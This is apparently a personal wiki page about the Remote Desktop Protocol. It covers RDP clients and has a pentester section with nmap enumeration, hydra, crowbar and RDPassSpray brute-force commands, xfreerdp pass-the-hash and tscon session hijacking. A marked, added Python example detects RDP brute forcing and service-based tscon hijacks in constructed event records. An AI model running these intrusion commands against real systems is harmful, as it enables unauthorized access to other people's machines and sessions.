Remote Desktop Protocol (RDP)

windowsfundamentals footprinting

Remote Desktop Protocol (RDP) is a protocol used to access a desktop with a graphical interface from another computer over a network connection.

🐊️ Port: 3389 (TCP or rarely UDP)

It can be used to transfer files too, if the server supports it.


RDP Clients Overview

RDP Using Microsoft Terminal Services Client

On Windows, there is the built-in client: mstsc.exe. It has a few options to reduce the quality and increase performance.

Click on Show Options, then the Experience tab, and select Modem.


RDP Using rdesktop

There is rdesktop (1.2k ⭐).

$ rdesktop [...] -r disk:linux='/path/to/folder'

RDP Using FreeRDP

FreeRDP (10.1k ⭐) is a popular client that is available on many Linux distributions. There is a GUI called xfreerdp-gui (0.1k ⭐, 2020 🪦).

$ xfreerdp /u:username /p:password /v:IP
$ xfreerdp /u:username /pth:hash /v:IP
$ xfreerdp /dynamic-resolution +clipboard /timeout:50000 /cert:ignore /v:IP /u:x /p:y
$ xfreerdp [...] /drive:linux,/path/to/folder
$ xfreerdp [...] /drive:/usr/share/windows-resources,share

RDP Using Remmina

Remmina (2.1k ⭐) is a popular graphical RDP client. It's easy to use and it has as many useful features as the others do.

$ sudo apt install -y remmina
$ remmina # start it

Click on the + at the top-left to configure your RDP connections, for instance to share a folder or to go through an SSH tunnel to a pivot.

You can alternatively directly enter the IP then the credentials in the search bar of the main pane. Accept the certificate (if prompted).

In the preferences, you can select a keyboard mapping. In the Quality section, you can uncheck everything in every category.

Useful icons:

  • Home 🏠️: switch back to remmina main panel
  • Toggle Dynamic Resolution Update 🖼️: fit to your screen

📚 Navigate to \\tsclient\ to access the shared folder.

📚 You can create an SSH tunnel directly from the Remmina configuration.


RDP Pentester Notes ☠️

Enumeration

attacking_common_services passwordattacks

  • Using nmap to run scripts
$ # the nmap RDP scripts send an identifiable cookie, so they leave traces on the target (see --packet-trace)
$ sudo nmap -sV -sC -p 3389 --script rdp* IP

Foothold

password_attacks attacking_common_services passwordattacks

  • The password may be weak and vulnerable to brute force.
$ hydra -L user.list -P password.list rdp://IP -V
$ crowbar -b rdp -s IP/32 -u username -C password.list -v -n 64

There is also RDPassSpray (0.6k ⭐).

$ python3 RDPassSpray.py -u username -p password -t IP:port
$ python3 RDPassSpray.py -U usernames.lst -p password -t IP:port
$ python3 RDPassSpray.py [...] -d domain
$ python3 RDPassSpray.py [...] -T rdp_servers.lst

Exploitation

attacking_common_services

  • RDP Session Hijacking: connect to another user's session. On Windows, as admin, we can use tscon.
PS> tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}

On Windows Server prior to 2019, as a local administrator, we can use:

PS> sc.exe create sessionhijack binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#13"
PS> net start sessionhijack
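Added example (not part of these notes): defender-side detection logic, in Python, for the two techniques above, RDP password brute forcing (Foothold) and tscon session hijacking through a service (Exploitation). It runs over constructed Windows event records (Security 4625 with LogonType 10 for failed RDP logons, System 7045 for service installs); the field names follow the Windows event schema, but the records themselves are made up.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real telemetry). Security 4625 = failed logon,
# LogonType 10 = RemoteInteractive (RDP); System 7045 = new service installed.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 4625, "LogonType": 10, "IpAddress": "10.0.0.5",
                "TargetUserName": "user%d" % i, "Time": "2024-01-01T10:00:%02d" % (i * 2)})
    for i in range(12)  # 12 failures in 22 seconds from one source: a spray/brute force
] + [
    json.dumps({"EventID": 4625, "LogonType": 10, "IpAddress": "10.0.0.9",
                "TargetUserName": "alice", "Time": "2024-01-01T10:05:00"}),  # a single typo
    json.dumps({"EventID": 4625, "LogonType": 3, "IpAddress": "10.0.0.7",
                "TargetUserName": "svc", "Time": "2024-01-01T10:06:00"}),  # network logon, not RDP
    json.dumps({"EventID": 7045, "ServiceName": "sessionhijack",
                "ImagePath": "cmd.exe /k tscon 2 /dest:rdp-tcp#13", "Time": "2024-01-01T10:07:00"}),
    json.dumps({"EventID": 7045, "ServiceName": "backup",
                "ImagePath": r"C:\Program Files\Backup\agent.exe", "Time": "2024-01-01T10:08:00"}),
]

def parse(lines):
    """One JSON object per line, as a SIEM export would give them."""
    return [json.loads(line) for line in lines]

def rdp_bruteforce_sources(events, threshold=10, window=timedelta(minutes=1)):
    """Source IPs with >= threshold failed RDP logons (4625, LogonType 10)
    inside any sliding window of the given length."""
    by_ip = defaultdict(list)
    for e in events:
        if e.get("EventID") == 4625 and e.get("LogonType") == 10:
            by_ip[e["IpAddress"]].append(datetime.fromisoformat(e["Time"]))
    flagged = set()
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:  # shrink window from the left
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(ip)
                break
    return sorted(flagged)

def tscon_service_installs(events):
    """Names of 7045 service installs whose binary path runs tscon with /dest:,
    the service-based session-hijack pattern shown above."""
    hits = []
    for e in events:
        if e.get("EventID") == 7045:
            path = e.get("ImagePath", "").lower()
            if "tscon" in path and "/dest:" in path:
                hits.append(e["ServiceName"])
    return hits
```

Thresholds and the window are tuning knobs; a legitimate user mistyping a password a few times stays under them, as the second source in the sample does.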

Well-known CVEs

Additional Tools


👻 To-do 👻

Stuff that I found but have not read/used yet.